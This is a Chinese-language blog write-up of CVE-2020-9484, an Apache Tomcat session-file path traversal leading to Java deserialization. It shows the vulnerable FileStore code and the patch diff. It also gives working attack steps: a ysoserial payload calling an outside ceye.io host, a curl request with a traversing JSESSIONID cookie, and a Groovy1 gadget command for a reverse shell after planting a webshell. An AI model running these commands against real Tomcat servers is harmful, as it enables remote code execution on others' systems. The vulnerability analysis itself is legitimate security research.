ycdxsb CTF / CVE5 分钟 读完 (大约 733 个字)  0次访问

CVE-2020-9484

When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=“null” (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed.

攻击条件#

  • 存在文件上传(文件后缀为.session)

  • 启用了tomcatsession持久化功能,在conf/context.xml中开启

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <Context>

        ...

        <Manager className="org.apache.catalina.session.PersistentManager"
          debug="0"
          saveOnRestart="false"
          maxActiveSession="-1"
          minIdleSwap="-1"
          maxIdleSwap="-1"
          maxIdleBackup="-1">
            <Store className="org.apache.catalina.session.FileStore" directory="./session" />
        </Manager>
    </Context>

  • tomcat/libWEB-INF/lib下存在能够利用的反序列化gadget

漏洞原理#

org.apache.catalina.session.FileStore在使用load函数读取.session文件时,file函数未对/../路径穿越进行过滤

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
@Override
public Session load(String id) throws ClassNotFoundException, IOException {
    // Open an input stream to the specified pathname, if any
    File file = file(id); //file函数路径穿越
    if (file == null || !file.exists()) {
        return null;
    }

    Context context = getManager().getContext();
    Log contextLog = context.getLogger();

    if (contextLog.isDebugEnabled()) {
        contextLog.debug(sm.getString(getStoreName()+".loading", id, file.getAbsolutePath()));
    }

    ClassLoader oldThreadContextCL = context.bind(Globals.IS_SECURITY_ENABLED, null);

    try (FileInputStream fis = new FileInputStream(file.getAbsolutePath());
            ObjectInputStream ois = getObjectInputStream(fis)) {

        StandardSession session = (StandardSession) manager.createEmptySession();
        session.readObjectData(ois);
        session.setManager(manager);
        return session;
    } catch (FileNotFoundException e) {
        if (contextLog.isDebugEnabled()) {
            contextLog.debug("No persisted data file found");
        }
        return null;
    } finally {
        context.unbind(Globals.IS_SECURITY_ENABLED, oldThreadContextCL);
    }
}

file函数存在路径穿越,因此在请求时可以构造JSESSIONID使得它可以读到任意位置的.session文件进行反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
@@ -336,11 +342,20 @@ public final class FileStore extends StoreBase {
      *    used in the file naming.
      */
     private File file(String id) throws IOException {
-        if (this.directory == null) {
+        File storageDir = directory();
+        if (storageDir == null) {
             return null;
         }
+
         String filename = id + FILE_EXT;
-        File file = new File(directory(), filename);
+        File file = new File(storageDir, filename);
+
+        // Check the file is within the storage directory
+        if (!file.getCanonicalPath().startsWith(storageDir.getCanonicalPath())) {
+            log.warn(sm.getString("fileStore.invalid", file.getPath(), id));
+            return null;
+        }
+
         return file;
     }
 }

image-20201028100213679

由于当前类加载器破坏了双亲委托模型的隐式加载,Thread.currentThread().getContextClassLoader()可以加载到WEB-INF/lib下的依赖

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
protected ObjectInputStream getObjectInputStream(InputStream is) throws IOException {
    BufferedInputStream bis = new BufferedInputStream(is);

    CustomObjectInputStream ois;
    ClassLoader classLoader = Thread.currentThread().getContextClassLoader();

    if (manager instanceof ManagerBase) {
        ManagerBase managerBase = (ManagerBase) manager;
        ois = new CustomObjectInputStream(bis, classLoader, manager.getContext().getLogger(),
                managerBase.getSessionAttributeValueClassNamePattern(),
                managerBase.getWarnOnSessionAttributeFilterFailure());
    } else {
        ois = new CustomObjectInputStream(bis, classLoader);
    }

    return ois;

POC验证#

  • STEP1: 配置context.xml文件,允许session持久化

  • STEP2: 生成payload

    1
    java -jar ysoserial.jar URLDNS  "http://xxxxxx.ceye.io" > poc.session

  • STEP3:将poc.session放入某路径下(path)

  • STEP4:curl触发

    1
    curl -k 'https://ip:port/xxxxx.jsp' -H 'Cookie: JSESSIONID=../../../path/poc'

    image-20201028101800742

RCE攻击#

结合tomcat的其他漏洞:例如文件上传(CVE-2017-12615/CVE-2017-12617)上传webshell,在确保tomcat/libWEB-INF/lib下存在反序列化依赖时,可以使用ysoserial.jar构造反序列化反弹shell

例如:

1
java -jar ysoserial.jar Groovy1 "python shell.py" > poc.session

参考#

#

喜欢这篇文章?打赏一下作者吧

评论

关注我

链接

归档

订阅更新

邮件订阅,更新早知道

分类

最新文章

标签

AI2
CTF48
CVE4
Fuzz1
FuzzingBook1
HEVD5
NLP1
PyQt512
ROP Emporium2
Toddler's Bottle21
Web1
automatic analyse10
binary analyse1
codeql5
crypto7
fuzz3
life2
linux kernel2
machine learning1
mobile security1
others1
paper18
pentest3
pwn24
pwnable.kr21
re5
research20
security18
security situation awareness2
stack overflow3
tools2
windows8
work1
writeup5
数据库11
×